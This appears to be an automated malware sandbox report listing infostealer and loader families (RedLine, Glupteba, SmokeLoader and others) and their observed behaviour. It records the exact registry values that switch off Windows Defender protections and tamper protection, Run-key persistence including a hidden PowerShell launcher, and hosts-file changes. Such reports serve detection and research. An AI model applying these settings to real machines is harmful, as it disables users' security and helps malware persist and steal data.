SHA512 d869b1d2f1e673928c0f525b66e9499e0b5bcbf36f8879bd816345dfb68566992c685f178c3f85747461565697ec85e40449bdc0ee8f666fc6a8fe579fb6cf4e

memory/2912-1445-0x00000000026C0000-0x0000000002AB8000-memory.dmp

memory/1576-1444-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c2fc153f1adbb692a5103e927a668ca9
SHA1 189661dec866dbc9b6111e7635bd43d90b917bdb
SHA256 62d00b3a92c58cfce2eebb4d6af9c25b0c3e93a1dc6e3035be6a3bee1661287e
SHA512 69c34dbea1ca2b06957ffcbfa261b01cec6e45a835d8d1f48079caab854b2fb119174042fa409f42f387fe0784c800aecd5d629f269843b81ad19bd93a91b080

memory/2912-1493-0x00000000026C0000-0x0000000002AB8000-memory.dmp

memory/2912-1494-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1108-1495-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-19 13:52

Reported

2023-10-19 13:54

Platform

win10v2004-20230915-en

Max time kernel

119s

Max time network

155s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EAB3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\22B0.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\E5AD.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E6B7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E90B.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1dQ56Ol6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2mi256Fu.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EAB3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EDD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EF0A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F0C1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F834.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\22B0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\285E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\292A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3282.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\EA06.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\E5AD.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Gr2hm8zp.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\Ed3wn2xf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\nu7Xc1Qq.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\RK5OL8oK.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\292A.exe'\"" C:\Users\Admin\AppData\Local\Temp\292A.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1926387074-3400613176-3566796709-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Detected potential entity reuse from brand microsoft.

phishing microsoft

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
